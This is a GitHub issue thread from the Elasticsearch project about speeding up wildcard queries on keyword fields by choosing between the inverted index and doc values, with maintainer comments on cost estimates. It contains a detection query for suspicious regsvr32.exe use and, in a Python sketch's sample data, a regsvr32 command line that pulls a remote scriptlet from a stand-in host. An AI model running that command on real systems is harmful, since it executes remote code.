elastic / elasticsearch

Free and Open Source, Distributed, RESTful Search Engine
https://www.elastic.co/products/elasticsearch

Query planning for wildcard queries with keyword fields #70612

Open rw-access opened 3 years ago

rw-access commented 3 years ago

Wildcard queries are pretty common but often come at a performance cost. Although the new wildcard data type is optimized for search speed on high-cardinality fields, recent findings have shown that it can come at the cost of ingest speed and index size.

I think there's another option to optimize the search speed of wildcard queries on keyword fields without increasing the ingest cost: knowing when to search the inverted index versus when to verify with doc values against a limited set of candidate documents could lead to better search times.

Wildcard queries are unavoidable in some domains or solutions, like security. They can be a sore spot, so improvements here could have a major positive impact.

For example, here's one KQL query that could run faster with doc values:

event.category : process and process.name : regsvr32.exe and process.command_line : *https\:*//*
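To make the idea concrete, here is a toy sketch (plain Python, not Elasticsearch internals; the documents and field names are invented) of evaluating the query above by applying the cheap, selective term clauses first and running the expensive wildcard only against the stored values of the few surviving documents:

```python
import fnmatch

# Hypothetical documents; in Elasticsearch these would be indexed docs.
docs = [
    {"event.category": "process", "process.name": "regsvr32.exe",
     "process.command_line": "regsvr32.exe /s /i:https://evil.example/x scrobj.dll"},
    {"event.category": "process", "process.name": "regsvr32.exe",
     "process.command_line": "regsvr32.exe /s local.dll"},
    {"event.category": "network", "process.name": "chrome.exe",
     "process.command_line": "chrome.exe"},
]

def query(docs):
    # Selective term filters first (index lookups in a real engine)...
    survivors = [d for d in docs
                 if d["event.category"] == "process"
                 and d["process.name"] == "regsvr32.exe"]
    # ...then the wildcard verifies only the small survivor set,
    # the way a doc-values check would.
    return [d for d in survivors
            if fnmatch.fnmatchcase(d["process.command_line"], "*https:*//*")]

matches = query(docs)  # only the first document survives both phases
```

The point of the sketch is the ordering: the wildcard never touches documents already excluded by the cheap clauses.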

Rationale/heuristic:

Complexities:

Possible approaches:

I will defer to the experts @markharwood @jpountz to decide and figure out what's best. My understanding of the low-level details here is limited, so please don't take my suggestions too literally. Whatever approach is best, I do think that improving wildcard search speed would add significant value for our users, without significant cost.

Links This is a similar approach to range query planning, as was done in https://www.elastic.co/blog/better-query-planning-for-range-queries-in-elasticsearch

elasticmachine commented 3 years ago

Pinging @elastic/es-perf (Team:Performance)

jpountz commented 3 years ago

> How do we estimate the number of documents matching regsvr32.exe? Do we need stats?

Actually, we already have these stats in the inverted index: the "document frequency". This is generalized across all queries, which by contract must be able to provide an estimate of their number of matches, called the "cost". We use these costs today to figure out the best order in which to evaluate the clauses of conjunctive boolean queries, from the clause with the fewest matches to the one with the most.
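That cost-ordered evaluation can be sketched as follows (an illustrative toy, not Lucene's actual implementation: postings lists here are plain sorted lists of doc IDs, and "cost" is just their length, standing in for document frequency):

```python
def conjunction(postings_lists):
    # Sort clauses by estimated cost (number of matches); for a term
    # clause this estimate is its document frequency.
    ordered = sorted(postings_lists, key=len)
    lead, others = ordered[0], ordered[1:]
    other_sets = [set(p) for p in others]
    # Drive iteration from the cheapest, most selective clause and
    # check the remaining clauses against each of its candidates.
    return [doc for doc in lead if all(doc in s for s in other_sets)]

hits = conjunction([
    [1, 2, 3, 5, 8, 13, 21, 34],  # frequent term, high cost
    [2, 3, 5, 8],                 # rarer term
    [3, 8, 34],                   # rarest term, drives the loop
])
# hits == [3, 8]
```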

Let me share some additional context.

On wildcard fields, wildcard/regexp queries are generally parsed as the conjunction of a fast approximation, based on substrings that can be extracted from the query, and a slow verification using doc values. I expect these queries to run rather efficiently, including when intersected with highly selective clauses.
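A minimal sketch of that approximation-then-verification split (pure Python; in the real wildcard field the approximation is an n-gram index lookup, not a scan):

```python
import fnmatch
import re

def required_substrings(pattern):
    # Literal runs between wildcard characters must all appear in any
    # match, so they form a cheap necessary-but-not-sufficient filter.
    return [s for s in re.split(r"[*?]", pattern) if s]

def wildcard_query(values, pattern):
    subs = required_substrings(pattern)
    # Fast approximation: keep values containing every literal run.
    candidates = [v for v in values if all(s in v for s in subs)]
    # Slow verification: run the full pattern on the candidates only.
    return [v for v in candidates if fnmatch.fnmatchcase(v, pattern)]

values = ["https://a//b", "http://a", "xhttps:c//d", "//xhttps:y"]
hits = wildcard_query(values, "*https:*//*")
# "//xhttps:y" passes the substring approximation but fails
# verification, because the pattern requires "//" after "https:".
```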

Keyword fields are harder because they don't directly give access from documents to values: there is an indirection where documents are associated with ordinals, which uniquely identify terms in the terms dictionary of the field. This gives us two strategies for running doc values against keyword fields:

The most common performance penalty with regexp/wildcard queries comes from the up-front cost of evaluating all terms of the terms dictionary against the query (even though this is done in an optimized way), so we'd need to use the latter approach.

I think your idea of using the field cardinality as a metric for the cost of the wildcard/regexp query is a good one, and as you guessed, the hard work will be figuring out a good factor for deciding whether we should use the index or doc values to run the query.
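As a rough sketch of the decision being discussed (all numbers and the tuning factor are invented, not a proposed implementation): the index approach pays roughly once per unique term in the field, while the doc-values approach pays roughly once per document matched by the other, cheaper clauses.

```python
def choose_strategy(field_cardinality, lead_clause_cost, factor=1.0):
    # Index approach: evaluate the pattern against every term in the
    # terms dictionary, so cost scales with field cardinality.
    index_cost = field_cardinality
    # Doc-values approach: verify only the documents surviving the
    # cheapest conjunct; `factor` is a hypothetical tunable weighting
    # the relative per-item cost of the two approaches.
    doc_values_cost = lead_clause_cost * factor
    return "doc_values" if doc_values_cost < index_cost else "index"

# High-cardinality field + selective lead clause favors doc values:
choose_strategy(field_cardinality=5_000_000, lead_clause_cost=200)   # "doc_values"
# Low-cardinality field favors the inverted index:
choose_strategy(field_cardinality=50, lead_clause_cost=100_000)      # "index"
```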

elasticmachine commented 3 years ago

Pinging @elastic/es-search (Team:Search)

elasticsearchmachine commented 3 months ago

Pinging @elastic/es-search-relevance (Team:Search Relevance)